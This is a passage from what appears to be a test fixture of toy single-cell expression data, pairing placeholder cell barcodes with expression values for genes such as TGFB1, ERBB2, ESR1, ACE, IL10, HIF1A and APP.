"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_8DBCDDCCAACDDDCB-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB5_BazMoo_2ACDDDDADBCDDDCA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB2_BazMoo_5ADDADBBABBDCCAC-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"TGFB1 Expression": {
"name": "TGFB1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.58,
2.32,
2.58,
1.58,
3.0,
2.0,
1.0,
2.81,
2.58,
2.0,
3.0,
2.81,
2.81,
2.58,
2.58,
2.32,
2.0,
1.0,
2.32,
1.58,
1.0,
3.0,
1.0,
3.0,
2.81,
3.0,
2.58,
1.58,
1.0,
1.0,
1.58,
2.81,
2.81,
1.58,
3.0,
2.81,
1.0,
2.32,
3.0,
2.58,
1.0,
1.58,
3.0,
2.0,
1.58,
1.58,
2.58,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ERBB2 Cells": {
"name": "ERBB2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_1AADDCCADACBADAD-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB4_BazMoo_6CADCBCCBCDACDBD-1",
"FoobarAB8_BazMoo_7CCACACCBDDBBCBB-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CBDCCDBCDBCDCCC-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB8_BazMoo_6BCCBDBADAABDCCD-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB5_BazMoo_8BCCCDBABCCADCAB-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_6DADBACAAACBDDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB5_BazMoo_2DDBCCDBADBADCBC-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ERBB2 Expression": {
"name": "ERBB2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.0,
2.58,
1.58,
2.81,
2.81,
2.81,
2.32,
2.58,
2.81,
1.0,
2.81,
2.81,
2.81,
2.32,
2.32,
2.58,
2.81,
3.0,
2.32,
1.58,
2.81,
2.32,
1.0,
2.58,
1.0,
2.32,
2.32,
3.0,
1.0,
1.0,
2.32,
2.32,
1.58,
3.0,
3.0,
1.58,
2.0,
3.0,
2.32,
1.58,
2.58,
2.0,
2.58,
3.0,
3.0,
2.32,
2.81,
2.81,
1.0,
1.0,
2.32,
1.58,
2.81,
2.81,
2.32,
1.0,
2.81,
2.58,
2.32,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ESR1 Cells": {
"name": "ESR1 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB7_BazMoo_5BADDCDBCDDBCDAA-1",
"FoobarAB6_BazMoo_3CDCABAAADCACCBA-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1DADCDAADADACBDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB4_BazMoo_8DCDBDACADABCDDB-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_8BDCDBABDCCCBDDC-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_6ABCCABADCCDBCAA-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_5DADBADCDDCBDAAB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ESR1 Expression": {
"name": "ESR1 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.0,
2.81,
2.0,
3.0,
2.81,
2.32,
1.0,
1.58,
2.81,
2.0,
2.81,
2.32,
2.0,
2.58,
2.0,
3.0,
1.58,
3.0,
2.0,
1.0,
3.0,
2.0,
1.58,
3.0,
2.0,
3.0,
2.81,
2.0,
1.0,
2.58,
1.0,
2.32,
2.0,
2.81,
1.58,
2.0,
3.0,
1.0,
2.58,
1.0,
1.58,
2.81,
2.81,
3.0,
2.58,
2.81,
1.0,
2.81,
2.81,
2.58,
3.0,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ACE Cells": {
"name": "ACE Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_2DABDACBCCCCADBC-1",
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_7AADDADDDCADABDD-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB8_BazMoo_4BDDDDBCBCAABDDD-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB2_BazMoo_1DDDBDCCBCBCACAA-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB3_BazMoo_2CDDDCADDBDBDABB-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB6_BazMoo_3DBACDBDAAADABDB-1",
"FoobarAB8_BazMoo_2CCBABBDDADCCDBD-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB4_BazMoo_3BADBCDDABDDCDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB5_BazMoo_7DABADCCDABDBAAB-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"ACE Expression": {
"name": "ACE Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
1.0,
1.0,
2.81,
1.58,
2.32,
3.0,
2.58,
2.32,
2.0,
2.0,
1.58,
2.0,
2.0,
3.0,
2.0,
2.81,
2.32,
3.0,
1.0,
2.81,
2.58,
3.0,
2.0,
1.58,
2.58,
2.81,
2.81,
1.0,
2.58,
2.0,
1.0,
1.0,
2.32,
2.81,
2.58,
2.81,
2.58,
2.81,
2.32,
2.0,
2.81,
2.58,
2.58,
3.0,
1.58,
1.0,
1.0,
1.0,
2.81,
2.81,
2.0,
2.0,
2.32,
2.32,
1.58,
1.0,
1.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL10 Cells": {
"name": "IL10 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_5BBDADACAABADAAB-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB6_BazMoo_3BADDCCDACDAAAAD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_6CBCADAABADDCCBC-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB4_BazMoo_2BBDBCACBADBDDBA-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB5_BazMoo_1DCBBBBDACADABAA-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_7BDCABCBDAADCBBA-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB3_BazMoo_4CABACABDCCCADCA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB5_BazMoo_6DBCBCDABBADCCCB-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB7_BazMoo_5DCDDDDABACBDACA-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB3_BazMoo_4CAAACBDCBCBBBCA-1",
"FoobarAB2_BazMoo_3BCDCBCCBCCCCBAC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL10 Expression": {
"name": "IL10 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.58,
1.0,
1.58,
1.0,
1.0,
2.81,
2.81,
2.81,
2.58,
1.0,
2.32,
1.58,
2.58,
1.58,
2.32,
2.0,
1.58,
2.58,
1.58,
3.0,
1.0,
3.0,
2.81,
2.0,
1.0,
2.58,
1.58,
2.32,
2.81,
2.0,
2.58,
1.58,
2.0,
2.81,
1.58,
2.32,
1.0,
2.58,
2.81,
2.0,
2.32,
2.58,
2.32,
2.81,
1.0,
2.81,
1.0,
2.58,
2.58,
3.0,
3.0,
2.0,
2.81,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HIF1A Cells": {
"name": "HIF1A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_6ABAADADBBCAABDA-1",
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB7_BazMoo_5DAACACCCDADACBB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB3_BazMoo_8CDCBBDBCDBBDBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB8_BazMoo_6BABCBBCDBBCACDD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB3_BazMoo_7BCABDBCDBABBCBA-1",
"FoobarAB8_BazMoo_8ADAABACBACDDCAB-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB8_BazMoo_2CACAACCDBBBBBBB-1",
"FoobarAB1_BazMoo_6ABAAADABDACDDDA-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB3_BazMoo_1DBADBBCAACCBDDC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB4_BazMoo_1BCDCDADBDBCBDAD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB8_BazMoo_5CBBCCCADADDADDD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB1_BazMoo_4DDDCDCCABBDDABD-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"HIF1A Expression": {
"name": "HIF1A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
2.81,
2.0,
2.58,
2.32,
1.0,
2.32,
2.58,
2.58,
2.81,
3.0,
2.32,
3.0,
2.0,
2.32,
3.0,
1.58,
2.81,
2.81,
3.0,
2.58,
2.0,
3.0,
2.81,
2.32,
1.0,
1.0,
2.0,
2.58,
1.0,
3.0,
2.0,
1.0,
2.32,
2.58,
1.58,
2.81,
2.0,
2.32,
1.58,
2.58,
2.58,
1.0,
2.58,
1.0,
3.0,
1.58,
2.58,
1.0,
2.81,
2.32,
3.0,
2.58,
1.58,
1.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"APP Cells": {
"name": "APP Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB7_BazMoo_3ADABDACCCABBCBC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_3CBBBDBACDBABBCA-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB3_BazMoo_2DACADABBDACCBDC-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB6_BazMoo_6ABCBBDBAAADCDCC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB4_BazMoo_6DDACDDBBBAADBCC-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB6_BazMoo_1BCDADDDABDDBCDA-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB2_BazMoo_7CDBDADBACBAAAAC-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB8_BazMoo_5DADAAABCBADCDCC-1",
"FoobarAB3_BazMoo_2DACDBDCAAAAACBB-1",
